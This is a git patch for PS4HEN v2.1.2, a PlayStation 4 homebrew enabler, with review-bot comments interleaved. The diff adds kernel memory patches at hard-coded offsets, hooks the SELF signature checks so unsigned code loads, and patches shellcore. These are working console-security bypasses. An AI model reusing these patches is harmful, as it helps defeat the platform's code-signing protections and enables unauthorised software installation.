From e13b115e93f88852cefba7c1851f61fbd825b585 Mon Sep 17 00:00:00 2001
From: SiSTR0
Date: Wed, 5 Feb 2020 13:02:07 +0100
Subject: [PATCH] release v2.1.2
---
 README.md | 11 ++++++-----
 exploit.template | 2 +-
 exploit/index.html | 2 +-
 installer/include/defines.h | 4 ++--
 installer/include/offsets.h | 3 +++
 installer/source/main.c | 5 ++++-
 kpayload/include/offsets.h | 3 +++
 kpayload/source/fpkg.c | 1 -
 kpayload/source/fself.c | 14 +++++++++++---
 kpayload/source/patch.c | 6 ++++++
 10 files changed, 37 insertions(+), 14 deletions(-)
diff --git a/README.md b/README.md
index b0ee8e4..f36d15c 100644
--- a/README.md
+++ b/README.md
@@ -1,4 +1,4 @@
-# PS4HEN v2.1.1
+# PS4HEN v2.1.2
 ## Features
 - Homebrew Enabler
@@ -9,11 +9,12 @@
 - VR Support
 - Remote Package Install
 - Rest Mode Support
-- External HDD Format 6.xx Support
+- External HDD Format 7.xx Support
+- FW Version Spoof to 7.02
+- Debug Trophies Support
 ## Fixes
-- Black Screen Fix on Rest Mode
-- FW Version Spoof to 6.70
+- sys_dynlib_dlsym Patch
 ## Contributors
 Massive credits to the following:
@@ -32,6 +33,6 @@ Massive credits to the following:
 ## Testers
 - [SCORPION](https://twitter.com/SCORPION1399)
 - [KiiWii](https://twitter.com/defaultdnb)
-- [Leeful74](https://twitter.com/leeful74b)
+- [Leeful74](https://twitter.com/leeful74)
 - [opoisso893](https://twitter.com/opoisso893)
 - Anonymous
\ No newline at end of file
diff --git a/exploit.template b/exploit.template
index 0c54c47..ffad629 100644
--- a/exploit.template
+++ b/exploit.template
@@ -1 +1 @@
-PS4Jailbreak 5.05 (HEN)
\ No newline at end of file
+PS4Jailbreak 5.05 (HEN)
\ No newline at end of file
diff --git a/exploit/index.html b/exploit/index.html
index c01966e..4956b12 100644
--- a/exploit/index.html
+++ b/exploit/index.html
@@ -1 +1 @@
-PS4Jailbreak 5.05 (HEN)
\ No newline at end of file
+PS4Jailbreak 5.05 (HEN)
\ No newline at end of file
diff --git a/installer/include/defines.h b/installer/include/defines.h
index 840349e..a9f6261 100644
--- a/installer/include/defines.h
+++ b/installer/include/defines.h
@@ -2,14 +2,14 @@
 #define __DEFINES_H__
 #pragma once
-#define VERSION "2.1.1"
+#define VERSION "2.1.2"
 //#define DEBUG_SOCKET
 #define LOG_IP "192.168.1.3\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0"
 #define LOG_PORT 9023
-#define FAKE_FW_VERSION 0x06700061
+#define FAKE_FW_VERSION 0x07020000
 struct filedesc {
 void *useless1[3];
diff --git a/installer/include/offsets.h b/installer/include/offsets.h
index 784ad20..7540676 100644
--- a/installer/include/offsets.h
+++ b/installer/include/offsets.h
@@ -27,6 +27,9 @@
 #define enable_debug_rifs_patch1 0x064B2B0
 #define enable_debug_rifs_patch2 0x064B2D0
+// allow sys_dynlib_dlsym in all processes
+#define sys_dynlib_dlsym_patch 0x0237F3A
+
 // sdk version spoof - enable all VR fws
 #define sdk_version_patch 0x14A63F0
diff --git a/installer/source/main.c b/installer/source/main.c
index b938a20..b4f2b56 100644
--- a/installer/source/main.c
+++ b/installer/source/main.c
@@ -72,7 +72,10 @@ int install_payload(struct thread *td, struct install_payload_args* args)
 *(uint32_t *)(kernel_base + enable_debug_rifs_patch1) = 0x90C301B0;
 *(uint32_t *)(kernel_base + enable_debug_rifs_patch2) = 0x90C301B0;
-// enable vr 5.05
+// flatz allow sys_dynlib_dlsym in all processes 5.05
+*(uint64_t*)(kernel_base + sys_dynlib_dlsym_patch) = 0x8B4890000001C1E9;
+
+// spoof sdk_version - enable vr 5.05
 *(uint32_t *)(kernel_base + sdk_version_patch) = FAKE_FW_VERSION;
 // install kpayload
diff --git a/kpayload/include/offsets.h b/kpayload/include/offsets.h
index bd1e6f5..9bfda02 100644
--- a/kpayload/include/offsets.h
+++ b/kpayload/include/offsets.h
@@ -107,4 +107,7 @@
 // enable support with 6.xx external hdd
 #define ext_hdd_patch 0x593C7D
+// enable debug trophies on retail
+#define debug_trophies_patch 0x6ABE39
+
 #endif
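Review bot: The new store at `kernel_base + sys_dynlib_dlsym_patch` in install_payload writes eight bytes through a `uint64_t` right next to the 4-byte `uint32_t` patches, and the only explanation is an attribution; because the literal is stored little-endian, the byte that lands at the patch address is the lowest-order byte of `0x8B4890000001C1E9`, which is easy to misread when someone checks the constant against a listing of the target. The comment should say what the write is, not only who found it, e.g. `// 5.05: 8-byte code patch, little-endian; lifts the per-process restriction in sys_dynlib_dlsym (flatz)`, so the firmware it belongs to and the byte order are recorded next to the value. The cast is also written `*(uint64_t*)` while the surrounding lines use `*(uint32_t *)`; `*(uint64_t *)` keeps the file's spacing. install_payload continues past the hunk, so whether anything validates the target bytes before writing cannot be seen here.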
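Review bot: The context comment `// enable support with 6.xx external hdd` above `ext_hdd_patch` in kpayload/include/offsets.h looks stale: README in this same commit changes the feature line to 7.xx while the offset is unchanged, so presumably the same patch covers both formats and the comment should say so, e.g. `// enable support with 6.xx/7.xx external hdd`. The new `debug_trophies_patch` entry, like the rest of the header, does not record which firmware build the offset was taken from; the `// 5.05` tag that fself.c uses would make the header self-describing.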
diff --git a/kpayload/source/fpkg.c b/kpayload/source/fpkg.c
index 789bd20..76645af 100644
--- a/kpayload/source/fpkg.c
+++ b/kpayload/source/fpkg.c
@@ -17,7 +17,6 @@ extern int (*fpu_kern_enter)(struct thread *td, struct fpu_kern_ctx *ctx, uint32
 extern int (*fpu_kern_leave)(struct thread *td, struct fpu_kern_ctx *ctx) PAYLOAD_BSS;
 extern void* (*memcpy)(void* dst, const void* src, size_t len) PAYLOAD_BSS;
 extern void* (*memset)(void *s, int c, size_t n) PAYLOAD_BSS;
-extern int (*printf)(const char *fmt, ...) PAYLOAD_BSS;
 extern struct sbl_map_list_entry** SBL_DRIVER_MAPPED_PAGES PAYLOAD_BSS;
 extern struct sx* SBL_PFS_SX PAYLOAD_BSS;
diff --git a/kpayload/source/fself.c b/kpayload/source/fself.c
index 6507859..578b56b 100644
--- a/kpayload/source/fself.c
+++ b/kpayload/source/fself.c
@@ -286,7 +286,10 @@ PAYLOAD_CODE int my_sceSblAuthMgrVerifyHeader(struct self_context* ctx)
 PAYLOAD_CODE int my_sceSblAuthMgrSmLoadSelfSegment__sceSblServiceMailbox(unsigned long service_id, uint8_t* request, void* response)
 {
-register struct self_context* ctx __asm ("r14"); // 5.05
+// self_context is first param of caller. 0x08 = sizeof(struct self_context*)
+uint8_t* frame = (uint8_t*)__builtin_frame_address(1);
+struct self_context* ctx = *(struct self_context**)(frame - 0x08);
+
 int is_unsigned = ctx && is_fake_self(ctx);
 if (is_unsigned) {
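Review bot: The comment `// self_context is first param of caller. 0x08 = sizeof(struct self_context*)` justifies the offset with the size of a pointer, but `frame - 0x08` is the slot where the caller's compiled code happens to spill its first argument below its frame pointer, which is a property of that caller in this firmware build and not of the pointer type; the line being removed at least tagged the assumption with `// 5.05`. `__builtin_frame_address(1)` is also documented by GCC as having unpredictable effects unless every frame in between keeps a frame pointer, so that is a second assumption worth stating. Suggested replacement: `// 5.05: the caller spills its first arg (ctx) at [frame-8] and keeps a frame pointer; both are firmware/codegen-specific`. The identical comment is added to my_sceSblAuthMgrSmLoadSelfBlock__sceSblServiceMailbox in the next hunk and should be corrected there as well. Both functions continue past their hunks.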
@@ -298,8 +301,10 @@ PAYLOAD_CODE int my_sceSblAuthMgrSmLoadSelfSegment__sceSblServiceMailbox(unsigne
 PAYLOAD_CODE int my_sceSblAuthMgrSmLoadSelfBlock__sceSblServiceMailbox(unsigned long service_id, uint8_t* request, void* response)
 {
+// self_context is first param of caller. 0x08 = sizeof(struct self_context*)
 uint8_t* frame = (uint8_t*)__builtin_frame_address(1);
-struct self_context* ctx = *(struct self_context**)(frame - 0x1C8); // 5.05
+struct self_context* ctx = *(struct self_context**)(frame - 0x08);
+
 vm_offset_t segment_data_gpu_va = *(unsigned long*)(request + 0x08);
 vm_offset_t cur_data_gpu_va = *(unsigned long*)(request + 0x50);
 vm_offset_t cur_data2_gpu_va = *(unsigned long*)(request + 0x58);
@@ -323,7 +328,10 @@ PAYLOAD_CODE int my_sceSblAuthMgrSmLoadSelfBlock__sceSblServiceMailbox(unsigned
 /* data spans two consecutive memory's pages, so we need to copy twice */
 size1 = PAGE_SIZE - data_offset;
 memcpy((char*)segment_data_cpu_va, (char*)cur_data_cpu_va + data_offset, size1);
-memcpy((char*)segment_data_cpu_va + size1, (char*)cur_data2_cpu_va, data_size - size1);
+
+// thanks to kiwidog & Al-Azif
+if (cur_data2_cpu_va)
+memcpy((char*)segment_data_cpu_va + size1, (char*)cur_data2_cpu_va, data_size - size1);
 } else {
 memcpy((char*)segment_data_cpu_va, (char*)cur_data_cpu_va + data_offset, data_size);
 }
diff --git a/kpayload/source/patch.c b/kpayload/source/patch.c
index e5ec3d9..8e357a9 100644
--- a/kpayload/source/patch.c
+++ b/kpayload/source/patch.c
@@ -231,6 +231,12 @@ PAYLOAD_CODE int shellcore_fpkg_patch(void)
 if (ret)
 goto error;
+// enable debug trophies on retail
+ret = proc_write_mem(ssc, (void *)(text_seg_base + debug_trophies_patch), 5, "\x31\xc0\x90\x90\x90", &n);
+if (ret)
+{
+goto error;
+}
 error:
 if (entries)
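Review bot: The added `if (cur_data2_cpu_va)` guard in the two-page branch avoids dereferencing a null second-page pointer, but when it is null the tail of the destination, `data_size - size1` bytes starting at `segment_data_cpu_va + size1`, is left holding whatever was there before and nothing tells the caller the block is only partially filled. The new comment only credits contributors; it should state the accepted outcome, e.g. `// cur_data2_cpu_va may be 0; the second copy is then skipped and the tail of the block is left as-is`, and if a partially written block is not acceptable the branch should return an error instead. How cur_data2_cpu_va is derived lies above the hunk, so whether null is a legitimate state here is inferred. The new single-statement `if` is also unbraced while the enclosing `if`/`else` uses braces.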
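Review bot: The new `if (ret) { goto error; }` in shellcore_fpkg_patch jumps to the `error:` label on the very next line, so the branch changes nothing, and its braced form differs from the `if (ret) goto error;` used by the check directly above it; write it as `if (ret) goto error;` for consistency, or drop it and note that the last write's `ret` simply falls through to the cleanup (the function's tail is outside the hunk, so that it returns `ret` from there is inferred). The byte string `"\x31\xc0\x90\x90\x90"` is an undocumented code patch; the comment should name the instruction sequence it encodes and why the length passed to proc_write_mem must be exactly 5, so a reader can check it against the target without guessing.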